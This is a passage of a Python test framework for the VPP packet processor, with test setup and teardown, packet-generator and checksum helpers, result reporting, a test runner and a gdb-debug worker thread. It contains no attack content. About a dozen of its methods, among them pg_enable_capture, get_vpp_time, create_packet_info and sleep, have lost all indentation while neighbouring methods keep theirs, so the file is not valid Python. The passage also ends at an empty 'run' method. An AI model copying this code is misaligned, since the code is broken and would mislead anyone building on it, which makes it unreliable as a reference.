        tearDown(); the default implementation only logs a placeholder.
        """
        self.logger.info("--- No test specific show commands provided. ---")
    def tearDown(self):
        """ Show various debug prints after each test

        Also saves the VPP API trace to the test temp dir and removes the
        configuration registered during the test. If VPP is discovered to
        be dead (VppTransportShmemIOError), marks self.vpp_dead instead of
        failing.
        """
        self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
                          (self.__class__.__name__, self._testMethodName,
                           self._testMethodDoc))
        try:
            if not self.vpp_dead:
                self.logger.debug(self.vapi.cli("show trace max 1000"))
                self.logger.info(self.vapi.ppcli("show interface"))
                self.logger.info(self.vapi.ppcli("show hardware"))
                self.logger.info(self.statistics.set_errors_str())
                self.logger.info(self.vapi.ppcli("show run"))
                self.logger.info(self.vapi.ppcli("show log"))
                self.logger.info(self.vapi.ppcli("show bihash"))
                self.logger.info("Logging testcase specific show commands.")
                self.show_commands_at_teardown()
                self.registry.remove_vpp_config(self.logger)
                # Save/Dump VPP api trace log
                m = self._testMethodName
                api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
                tmp_api_trace = "/tmp/%s" % api_trace
                vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
                self.logger.info(self.vapi.ppcli("api trace save %s" %
                                                 api_trace))
                # VPP writes the trace under /tmp; move it to the test dir
                self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
                                                        vpp_api_trace_log))
                os.rename(tmp_api_trace, vpp_api_trace_log)
                self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
                                                 vpp_api_trace_log))
        except VppTransportShmemIOError:
            self.logger.debug("VppTransportShmemIOError: Vpp dead. "
                              "Cannot log show commands.")
            self.vpp_dead = True
        else:
            self.registry.unregister_all(self.logger)
    def setUp(self):
        """ Clear trace before running each test

        :raises VppDiedError: if a previous test in this class already
            killed VPP (self.vpp_dead) - remaining tests cannot run
        """
        super(VppTestCase, self).setUp()
        self.reporter.send_keep_alive(self)
        if self.vpp_dead:
            raise VppDiedError(rv=None, testcase=self.__class__.__name__,
                               method_name=self._testMethodName)
        self.sleep(.1, "during setUp")
        # markers in the captured vpp output so logs can be correlated
        # with individual tests
        self.vpp_stdout_deque.append(
            "--- test setUp() for %s.%s(%s) starts here ---\n" %
            (self.__class__.__name__, self._testMethodName,
             self._testMethodDoc))
        self.vpp_stderr_deque.append(
            "--- test setUp() for %s.%s(%s) starts here ---\n" %
            (self.__class__.__name__, self._testMethodName,
             self._testMethodDoc))
        self.vapi.cli("clear trace")
        # store the test instance inside the test class - so that objects
        # holding the class can access instance methods (like assertEqual)
        type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
    @classmethod
    def register_capture(cls, cap_name):
        """ Register a capture in the testclass

        :param cap_name: name of the packet-generator capture; stored so
            pg_start() can later delete it
        """
        # add to the list of captures with current timestamp
        cls._captures.append((time.time(), cap_name))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
    @classmethod
    def pg_start(cls):
        """ Enable the PG, wait till it is done, then clean up """
        # capture a trace of up to 1000 packets entering via pg-input
        cls.vapi.cli("trace add pg-input 1000")
        cls.vapi.cli('packet-generator enable')
        # PG, when starts, runs to completion -
        # so let's avoid a race condition,
        # and wait a little till it's done.
        # Then clean it up - and then be gone.
        deadline = time.time() + 300
        # "Yes" in the CLI output indicates a generator is still enabled
        while cls.vapi.cli('show packet-generator').find("Yes") != -1:
            cls.sleep(0.01)  # yield
            if time.time() > deadline:
                cls.logger.error("Timeout waiting for pg to stop")
                break
        # remove all registered captures now that generation finished
        for stamp, cap_name in cls._captures:
            cls.vapi.cli('packet-generator delete %s' % cap_name)
        cls._captures = []
    @classmethod
    def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
        """
        Create packet-generator interfaces.

        Each created interface is also set as a class attribute under its
        own name (e.g. cls.pg0) and the full list stored in
        cls.pg_interfaces.

        :param interfaces: iterable indexes of the interfaces.
        :param gso: GSO setting passed to VppPGInterface
        :param gso_size: GSO size passed to VppPGInterface
        :returns: List of created interfaces.

        """
        result = []
        for i in interfaces:
            intf = VppPGInterface(cls, i, gso, gso_size)
            setattr(cls, intf.name, intf)
            result.append(intf)
        cls.pg_interfaces = result
        return result
    @classmethod
    def create_loopback_interfaces(cls, count):
        """
        Create loopback interfaces.

        Each created interface is also set as a class attribute under its
        own name and the full list stored in cls.lo_interfaces.

        :param count: number of interfaces created.
        :returns: List of created interfaces.
        """
        result = [VppLoInterface(cls) for i in range(count)]
        for intf in result:
            setattr(cls, intf.name, intf)
        cls.lo_interfaces = result
        return result
    @classmethod
    def create_bvi_interfaces(cls, count):
        """
        Create BVI interfaces.

        Each created interface is also set as a class attribute under its
        own name and the full list stored in cls.bvi_interfaces.

        :param count: number of interfaces created.
        :returns: List of created interfaces.
        """
        result = [VppBviInterface(cls) for i in range(count)]
        for intf in result:
            setattr(cls, intf.name, intf)
        cls.bvi_interfaces = result
        return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
    @classmethod
    def reset_packet_infos(cls):
        """ Reset the list of packet info objects and packet counts to zero """
        # index -> _PacketInfo created by create_packet_info()
        cls._packet_infos = {}
        # dst sw_if_index -> number of packets destined to that interface
        cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
    @staticmethod
    def payload_to_info(payload, payload_field='load'):
        """
        Convert packet payload to _PacketInfo object

        The payload is the space-separated string produced by
        info_to_payload(); trailing padding (spaces) is harmless since
        split() discards it.

        :param payload: packet payload
        :type payload:  <class 'scapy.packet.Raw'>
        :param payload_field: packet fieldname of payload "load" for
                <class 'scapy.packet.Raw'>
        :type payload_field: str
        :returns: _PacketInfo object containing de-serialized data from payload

        """
        numbers = getattr(payload, payload_field).split()
        info = _PacketInfo()
        info.index = int(numbers[0])
        info.src = int(numbers[1])
        info.dst = int(numbers[2])
        info.ip = int(numbers[3])
        info.proto = int(numbers[4])
        return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
    def assert_equal(self, real_value, expected_value, name_or_class=None):
        """assertEqual with a descriptive failure message.

        :param name_or_class: either a plain name inserted into the
            message, or a class/enum-like callable - in that case
            getdoc() of it and str(name_or_class(value)) are used to
            pretty-print both values
        """
        if name_or_class is None:
            self.assertEqual(real_value, expected_value)
            return
        try:
            msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
            msg = msg % (getdoc(name_or_class).strip(),
                         real_value, str(name_or_class(real_value)),
                         expected_value, str(name_or_class(expected_value)))
        except Exception:
            # pretty-printing failed (e.g. value not valid for the class);
            # fall back to a plain message
            msg = "Invalid %s: %s does not match expected value %s" % (
                name_or_class, real_value, expected_value)

        self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
    def assert_packet_checksums_valid(self, packet,
                                      ignore_zero_udp_checksums=True):
        """Verify every checksum field in the packet is correct.

        Strategy: re-parse the packet, delete each checksum field so
        scapy recomputes it on rebuild, then compare the recomputed
        values against the originally received ones.

        :param packet: scapy packet to check
        :param ignore_zero_udp_checksums: skip UDP checksums equal to 0
            (0 means "no checksum" for UDP)
        """
        received = packet.__class__(scapy.compat.raw(packet))
        udp_layers = ['UDP', 'UDPerror']
        checksum_fields = ['cksum', 'chksum']
        checksums = []
        counter = 0
        temp = received.__class__(scapy.compat.raw(received))
        while True:
            layer = temp.getlayer(counter)
            if layer:
                # work on a payload-less copy so hasattr checks see only
                # this layer's fields
                layer = layer.copy()
                layer.remove_payload()
                for cf in checksum_fields:
                    if hasattr(layer, cf):
                        if ignore_zero_udp_checksums and \
                                0 == getattr(layer, cf) and \
                                layer.name in udp_layers:
                            continue
                        # delete the field so scapy recalculates it
                        delattr(temp.getlayer(counter), cf)
                        checksums.append((counter, cf))
            else:
                break
            counter = counter + 1
        if 0 == len(checksums):
            return
        # rebuild: scapy fills in the deleted checksum fields
        temp = temp.__class__(scapy.compat.raw(temp))
        for layer, cf in checksums:
            calc_sum = getattr(temp[layer], cf)
            self.assert_equal(
                getattr(received[layer], cf), calc_sum,
                "packet checksum on layer #%d: %s" % (layer, temp[layer].name))
            self.logger.debug(
                "Checksum field `%s` on `%s` layer has correct value `%s`" %
                (cf, temp[layer].name, calc_sum))
    def assert_checksum_valid(self, received_packet, layer,
                              field_name='chksum',
                              ignore_zero_checksum=False):
        """ Check checksum of received packet on given layer

        Deletes the checksum field from a re-parsed copy so scapy
        recomputes it on rebuild, then compares against the received
        value.

        :param received_packet: scapy packet as received
        :param layer: layer name (e.g. 'IP', 'TCP') to verify
        :param field_name: checksum field name on that layer
        :param ignore_zero_checksum: treat a received 0 checksum as valid
        """
        received_packet_checksum = getattr(received_packet[layer], field_name)
        if ignore_zero_checksum and 0 == received_packet_checksum:
            return
        recalculated = received_packet.__class__(
            scapy.compat.raw(received_packet))
        delattr(recalculated[layer], field_name)
        # rebuilding fills the deleted field with the recalculated value
        recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
        self.assert_equal(received_packet_checksum,
                          getattr(recalculated[layer], field_name),
                          "packet checksum on layer: %s" % layer)
    def assert_ip_checksum_valid(self, received_packet,
                                 ignore_zero_checksum=False):
        """Verify the IP header checksum of the received packet."""
        self.assert_checksum_valid(received_packet, 'IP',
                                   ignore_zero_checksum=ignore_zero_checksum)
    def assert_tcp_checksum_valid(self, received_packet,
                                  ignore_zero_checksum=False):
        """Verify the TCP checksum of the received packet."""
        self.assert_checksum_valid(received_packet, 'TCP',
                                   ignore_zero_checksum=ignore_zero_checksum)
    def assert_udp_checksum_valid(self, received_packet,
                                  ignore_zero_checksum=True):
        """Verify the UDP checksum; 0 means "no checksum" for UDP, so zero
        checksums are ignored by default."""
        self.assert_checksum_valid(received_packet, 'UDP',
                                   ignore_zero_checksum=ignore_zero_checksum)
    def assert_embedded_icmp_checksum_valid(self, received_packet):
        """Verify checksums of the original-packet layers embedded inside
        an ICMP error message (IPerror/TCPerror/UDPerror/ICMPerror),
        checking only the layers actually present."""
        if received_packet.haslayer(IPerror):
            self.assert_checksum_valid(received_packet, 'IPerror')
        if received_packet.haslayer(TCPerror):
            self.assert_checksum_valid(received_packet, 'TCPerror')
        if received_packet.haslayer(UDPerror):
            self.assert_checksum_valid(received_packet, 'UDPerror',
                                       ignore_zero_checksum=True)
        if received_packet.haslayer(ICMPerror):
            self.assert_checksum_valid(received_packet, 'ICMPerror')
    def assert_icmp_checksum_valid(self, received_packet):
        """Verify the ICMP checksum and the checksums of any embedded
        original-packet layers."""
        self.assert_checksum_valid(received_packet, 'ICMP')
        self.assert_embedded_icmp_checksum_valid(received_packet)
    def assert_icmpv6_checksum_valid(self, pkt):
        """Verify ICMPv6 checksums for the message types present in pkt
        (DestUnreach incl. embedded layers, EchoRequest, EchoReply)."""
        if pkt.haslayer(ICMPv6DestUnreach):
            self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
            self.assert_embedded_icmp_checksum_valid(pkt)
        if pkt.haslayer(ICMPv6EchoRequest):
            self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
        if pkt.haslayer(ICMPv6EchoReply):
            self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
    def get_packet_counter(self, counter):
        """Return the value of a counter.

        :param counter: a stats-segment path (starts with "/"), read via
            the stats socket; otherwise an error-counter name matched
            against "sh errors" CLI output (0 if not found)
        """
        if counter.startswith("/"):
            counter_value = self.statistics.get_counter(counter)
        else:
            counters = self.vapi.cli("sh errors").split('\n')
            counter_value = 0
            # NOTE(review): only the second whitespace-separated token of
            # each line is compared, so counter names containing spaces
            # will never match - confirm against "sh errors" output format
            for i in range(1, len(counters) - 1):
                results = counters[i].split()
                if results[1] == counter:
                    counter_value = int(results[0])
                    break
        return counter_value
    def assert_packet_counter_equal(self, counter, expected_value):
        """Assert that the packet counter (stats path or error-counter
        name, see get_packet_counter) has the expected value."""
        counter_value = self.get_packet_counter(counter)
        self.assert_equal(counter_value, expected_value,
                          "packet counter `%s'" % counter)
    def assert_error_counter_equal(self, counter, expected_value):
        """Assert that the named error counter (read via the stats
        segment) has the expected value."""
        counter_value = self.statistics.get_err_counter(counter)
        self.assert_equal(counter_value, expected_value,
                          "error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
    def pg_send(self, intf, pkts, worker=None):
        """Clear the trace, queue pkts on intf, enable capture on all pg
        interfaces and start the packet generator.

        :param intf: pg interface to send from
        :param pkts: packets to enqueue
        :param worker: optional worker thread index for the stream
        """
        self.vapi.cli("clear trace")
        intf.add_stream(pkts, worker=worker)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
    def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
        """Send pkts on intf and assert that NO pg interface captures
        anything in reply.

        :param timeout: how long to wait for stray packets on the first
            interface checked (default 1s); subsequent interfaces only
            wait 0.1s since the first wait already covered the window
        """
        self.pg_send(intf, pkts)
        if not timeout:
            timeout = 1
        for i in self.pg_interfaces:
            i.get_capture(0, timeout=timeout)
            i.assert_nothing_captured(remark=remark)
            # shorten the wait for the remaining interfaces
            timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker)
rx = output.get_capture(n_rx)
return rx
    def send_and_expect_only(self, intf, pkts, output, timeout=None):
        """Send pkts on intf; expect them ONLY on the `output` interface.

        Captures len(pkts) packets on `output` and asserts every other pg
        interface captured nothing.

        :param timeout: wait for stray packets on the first non-output
            interface checked (default 1s); later ones only wait 0.1s
        :returns: the capture taken from `output`
        """
        self.pg_send(intf, pkts)
        rx = output.get_capture(len(pkts))
        outputs = [output]
        if not timeout:
            timeout = 1
        for i in self.pg_interfaces:
            if i not in outputs:
                i.get_capture(0, timeout=timeout)
                i.assert_nothing_captured()
                # the first wait already covered the arrival window
                timeout = 0.1

        return rx
def get_testcase_doc_name(test):
    """Return the first line of the docstring of *test*'s class."""
    doc_lines = getdoc(test.__class__).splitlines()
    return doc_lines[0]
def get_test_description(descriptions, test):
    """Return the test's short description when descriptions are enabled
    and one exists; otherwise fall back to str(test)."""
    short = test.shortDescription()
    return short if (descriptions and short) else str(test)
class TestCaseInfo(object):
    """Per-test-case context kept for result reporting.

    Bundles the logger, temp directory, VPP PID and VPP binary path of a
    test case so result handling (failed-dir symlinking, core-file
    attribution) can refer to them after the test case finished.
    """
    def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
        self.logger = logger  # logger of the test case
        self.tempdir = tempdir  # temporary dir used by the test case
        self.vpp_pid = vpp_pid  # PID of the VPP process under test
        self.vpp_bin_path = vpp_bin_path  # path to the VPP binary
        # name of the test during which a core file appeared, if any
        self.core_crash_test = None

    def __repr__(self):
        # instances are stored in result sets and logged - a useful repr
        # makes debugging the result bookkeeping much easier
        return "%s(tempdir=%r, vpp_pid=%r, vpp_bin_path=%r)" % (
            type(self).__name__, self.tempdir, self.vpp_pid,
            self.vpp_bin_path)
class VppTestResult(unittest.TestResult):
    """
    @property result_string
     String variable to store the test case result string.
    @property errors
     List variable containing 2-tuples of TestCase instances and strings
     holding formatted tracebacks. Each tuple represents a test which
     raised an unexpected exception.
    @property failures
     List variable containing 2-tuples of TestCase instances and strings
     holding formatted tracebacks. Each tuple represents a test where
     a failure was explicitly signalled using the TestCase.assert*()
     methods.
    """
    # TestCaseInfo of test cases that failed (shared across instances)
    failed_test_cases_info = set()
    # TestCaseInfo of test cases during which VPP produced a core file
    core_crash_test_cases_info = set()
    # TestCaseInfo of the currently running test case (set in setUpClass)
    current_test_case_info = None
    def __init__(self, stream=None, descriptions=None, verbosity=None,
                 runner=None):
        """
        :param stream File descriptor to store where to report test results.
            Set to the standard error stream by default.
        :param descriptions Boolean variable to store information if to use
            test case descriptions.
        :param verbosity Integer variable to store required verbosity level.
        """
        super(VppTestResult, self).__init__(stream, descriptions, verbosity)
        self.stream = stream
        self.descriptions = descriptions
        self.verbosity = verbosity
        self.result_string = None
        self.runner = runner
    def addSuccess(self, test):
        """
        Record a test succeeded result

        :param test:

        """
        if self.current_test_case_info:
            self.current_test_case_info.logger.debug(
                "--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
                                                       test._testMethodName,
                                                       test._testMethodDoc))
        unittest.TestResult.addSuccess(self, test)
        self.result_string = colorize("OK", GREEN)
        self.send_result_through_pipe(test, PASS)
    def addSkip(self, test, reason):
        """
        Record a test skipped.

        :param test:
        :param reason:

        """
        if self.current_test_case_info:
            self.current_test_case_info.logger.debug(
                "--- addSkip() %s.%s(%s) called, reason is %s" %
                (test.__class__.__name__, test._testMethodName,
                 test._testMethodDoc, reason))
        unittest.TestResult.addSkip(self, test, reason)
        self.result_string = colorize("SKIP", YELLOW)
        self.send_result_through_pipe(test, SKIP)
    def symlink_failed(self):
        """Create a "<tempdir>-FAILED" symlink under $FAILED_DIR pointing
        at the failed test case's temp dir; errors are logged, not
        raised, so result reporting always continues."""
        if self.current_test_case_info:
            try:
                failed_dir = os.getenv('FAILED_DIR')
                link_path = os.path.join(
                    failed_dir,
                    '%s-FAILED' %
                    os.path.basename(self.current_test_case_info.tempdir))

                self.current_test_case_info.logger.debug(
                    "creating a link to the failed test")
                self.current_test_case_info.logger.debug(
                    "os.symlink(%s, %s)" %
                    (self.current_test_case_info.tempdir, link_path))
                if os.path.exists(link_path):
                    self.current_test_case_info.logger.debug(
                        'symlink already exists')
                else:
                    os.symlink(self.current_test_case_info.tempdir, link_path)

            except Exception as e:
                self.current_test_case_info.logger.error(e)
    def send_result_through_pipe(self, test, result):
        """Forward (test id, result) to the parent test framework process
        when a result pipe was attached to this result class."""
        if hasattr(self, 'test_framework_result_pipe'):
            pipe = self.test_framework_result_pipe
            if pipe:
                pipe.send((test.id(), result))
    def log_error(self, test, err, fn_name):
        """Log the error/failure and its formatted traceback to the
        current test case's logger (if any)."""
        if self.current_test_case_info:
            if isinstance(test, unittest.suite._ErrorHolder):
                # _ErrorHolder represents a setUp/tearDown-level error and
                # has no test method attributes
                test_name = test.description
            else:
                test_name = '%s.%s(%s)' % (test.__class__.__name__,
                                           test._testMethodName,
                                           test._testMethodDoc)
            self.current_test_case_info.logger.debug(
                "--- %s() %s called, err is %s" %
                (fn_name, test_name, err))
            self.current_test_case_info.logger.debug(
                "formatted exception is:\n%s" %
                "".join(format_exception(*err)))
    def add_error(self, test, err, unittest_fn, error_type):
        """Common bookkeeping for addFailure()/addError(): log, record via
        the given unittest function, symlink the failed temp dir and
        detect core files produced during the test.

        :param unittest_fn: unittest.TestResult.addFailure or .addError
        :param error_type: FAIL or ERROR
        :raises Exception: for any other error_type
        """
        if error_type == FAIL:
            self.log_error(test, err, 'addFailure')
            error_type_str = colorize("FAIL", RED)
        elif error_type == ERROR:
            self.log_error(test, err, 'addError')
            error_type_str = colorize("ERROR", RED)
        else:
            raise Exception('Error type %s cannot be used to record an '
                            'error or a failure' % error_type)

        unittest_fn(self, test, err)
        if self.current_test_case_info:
            self.result_string = "%s [ temp dir used by test case: %s ]" % \
                                 (error_type_str,
                                  self.current_test_case_info.tempdir)
            self.symlink_failed()
            self.failed_test_cases_info.add(self.current_test_case_info)
            if is_core_present(self.current_test_case_info.tempdir):
                if not self.current_test_case_info.core_crash_test:
                    # attribute the core file to the first failing test
                    if isinstance(test, unittest.suite._ErrorHolder):
                        test_name = str(test)
                    else:
                        test_name = "'{!s}' ({!s})".format(
                            get_testcase_doc_name(test), test.id())
                    self.current_test_case_info.core_crash_test = test_name
                self.core_crash_test_cases_info.add(
                    self.current_test_case_info)
        else:
            self.result_string = '%s [no temp dir]' % error_type_str

        self.send_result_through_pipe(test, error_type)
    def addFailure(self, test, err):
        """
        Record a test failed result

        :param test:
        :param err: error message

        """
        self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
    def addError(self, test, err):
        """
        Record a test error result

        :param test:
        :param err: error message

        """
        self.add_error(test, err, unittest.TestResult.addError, ERROR)
    def getDescription(self, test):
        """
        Get test description

        :param test:
        :returns: test description

        """
        return get_test_description(self.descriptions, test)
    def startTest(self, test):
        """
        Start a test

        Prints the test case's title banner once per test class and
        records the start time used by stopTest() for duration output.

        :param test:

        """

        def print_header(test):
            # the title is the first docstring line of the test class;
            # a missing docstring is a hard error
            test_doc = getdoc(test)
            if not test_doc:
                raise Exception("No doc string for test '%s'" % test.id())
            test_title = test_doc.splitlines()[0]
            test_title_colored = colorize(test_title, GREEN)
            if test.force_solo():
                # long live PEP-8 and 80 char width limitation...
                c = YELLOW
                test_title_colored = colorize("SOLO RUN: " + test_title, c)

            # print the banner only once per test class
            if not hasattr(test.__class__, '_header_printed'):
                print(double_line_delim)
                print(test_title_colored)
                print(double_line_delim)
            test.__class__._header_printed = True

        print_header(test)
        self.start_test = time.time()
        unittest.TestResult.startTest(self, test)
        if self.verbosity > 0:
            self.stream.writeln(
                "Starting " + self.getDescription(test) + " ...")
            self.stream.writeln(single_line_delim)
    def stopTest(self, test):
        """
        Called when the given test has been run

        Prints the result line (with elapsed time when not verbose) and
        forwards the TEST_RUN marker through the result pipe.

        :param test:

        """
        unittest.TestResult.stopTest(self, test)
        if self.verbosity > 0:
            self.stream.writeln(single_line_delim)
            self.stream.writeln("%-73s%s" % (self.getDescription(test),
                                             self.result_string))
            self.stream.writeln(single_line_delim)
        else:
            self.stream.writeln("%-68s %4.2f %s" %
                                (self.getDescription(test),
                                 time.time() - self.start_test,
                                 self.result_string))

        self.send_result_through_pipe(test, TEST_RUN)
    def printErrors(self):
        """
        Print errors from running the test case
        """
        if len(self.errors) > 0 or len(self.failures) > 0:
            self.stream.writeln()
            self.printErrorList('ERROR', self.errors)
            self.printErrorList('FAIL', self.failures)

        # ^^ that is the last output from unittest before summary
        if not self.runner.print_summary:
            # suppress unittest's own summary by redirecting both the
            # result's and the runner's stream to /dev/null
            devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
            self.stream = devnull
            self.runner.stream = devnull
    def printErrorList(self, flavour, errors):
        """
        Print error list to the output stream together with error type
        and test case description.

        :param flavour: error type
        :param errors: iterable errors

        """
        for test, err in errors:
            self.stream.writeln(double_line_delim)
            self.stream.writeln("%s: %s" %
                                (flavour, self.getDescription(test)))
            self.stream.writeln(single_line_delim)
            self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
    """
    A basic test runner implementation which prints results to standard error.
    """

    @property
    def resultclass(self):
        """Class maintaining the results of the tests"""
        return VppTestResult
    def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
                 result_pipe=None, failfast=False, buffer=False,
                 resultclass=None, print_summary=True, **kwargs):
        """
        :param keep_alive_pipe: pipe used by KeepAliveReporter to signal
            liveness to the parent framework process
        :param result_pipe: pipe through which per-test results are sent
            to the parent framework process
        :param print_summary: when False, unittest's final summary output
            is suppressed (see VppTestResult.printErrors)
        """
        # ignore stream setting here, use hard-coded stdout to be in sync
        # with prints from VppTestCase methods ...
        super(VppTestRunner, self).__init__(sys.stdout, descriptions,
                                            verbosity, failfast, buffer,
                                            resultclass, **kwargs)
        KeepAliveReporter.pipe = keep_alive_pipe
        # remember the real stream so run() can restore it after
        # printErrors() potentially swapped in /dev/null
        self.orig_stream = self.stream
        self.resultclass.test_framework_result_pipe = result_pipe
        self.print_summary = print_summary
    def _makeResult(self):
        # pass self so the result can consult runner.print_summary
        return self.resultclass(self.stream,
                                self.descriptions,
                                self.verbosity,
                                self)
    def run(self, test):
        """
        Run the tests

        :param test:

        """
        faulthandler.enable()  # emit stack trace to stderr if killed by signal

        result = super(VppTestRunner, self).run(test)
        if not self.print_summary:
            # restore the real stream that printErrors() replaced
            self.stream = self.orig_stream
            result.stream = self.orig_stream
        return result
class Worker(Thread):
    """Run an external executable on a background thread, capturing its
    stdout/stderr and return code in ``self.result``.

    Subclasses may set ``testcase``, ``role`` and ``wait_for_gdb``
    attributes (before ``__init__`` runs) to enable gdb/gdbserver
    debugging support.
    """

    def __init__(self, executable_args, logger, env=None, *args, **kwargs):
        """
        :param executable_args: full command line (argv list) to run
        :param logger: logger used for progress/output reporting
        :param env: extra environment variables for the child process
        """
        super(Worker, self).__init__(*args, **kwargs)
        self.logger = logger
        self.args = executable_args
        if hasattr(self, 'testcase') and self.testcase.debug_all:
            if self.testcase.debug_gdbserver:
                # BUG FIX: prepend the gdbserver wrapper to the command
                # line (self.args); previously this concatenated the
                # Thread *args tuple, producing a broken command.
                self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
                             .format(port=self.testcase.gdbserver_port)] \
                    + self.args
            elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
                self.args.append(self.wait_for_gdb)
        self.app_bin = executable_args[0]
        self.app_name = os.path.basename(self.app_bin)
        if hasattr(self, 'role'):
            self.app_name += ' {role}'.format(role=self.role)
        self.process = None
        self.result = None
        # deep-copy so later mutations by the caller cannot leak into the
        # environment handed to the subprocess
        env = {} if env is None else env
        self.env = copy.deepcopy(env)

    def wait_for_enter(self):
        """In gdb/gdbserver debug modes, print attach instructions and
        block until the operator presses ENTER; no-op otherwise."""
        if not hasattr(self, 'testcase'):
            return
        if self.testcase.debug_all and self.testcase.debug_gdbserver:
            print()
            print(double_line_delim)
            print("Spawned GDB Server for '{app}' with PID: {pid}"
                  .format(app=self.app_name, pid=self.process.pid))
        elif self.testcase.debug_all and self.testcase.debug_gdb:
            print()
            print(double_line_delim)
            print("Spawned '{app}' with PID: {pid}"
                  .format(app=self.app_name, pid=self.process.pid))
        else:
            return
        print(single_line_delim)
        print("You can debug '{app}' using:".format(app=self.app_name))
        if self.testcase.debug_gdbserver:
            print("sudo gdb " + self.app_bin +
                  " -ex 'target remote localhost:{port}'"
                  .format(port=self.testcase.gdbserver_port))
            print("Now is the time to attach gdb by running the above "
                  "command, set up breakpoints etc., then resume from "
                  "within gdb by issuing the 'continue' command")
            # each spawned server gets its own port
            self.testcase.gdbserver_port += 1
        elif self.testcase.debug_gdb:
            print("sudo gdb " + self.app_bin +
                  " -ex 'attach {pid}'".format(pid=self.process.pid))
            print("Now is the time to attach gdb by running the above "
                  "command and set up breakpoints etc., then resume from"
                  " within gdb by issuing the 'continue' command")
        print(single_line_delim)
        input("Press ENTER to continue running the testcase...")

    def run(self):
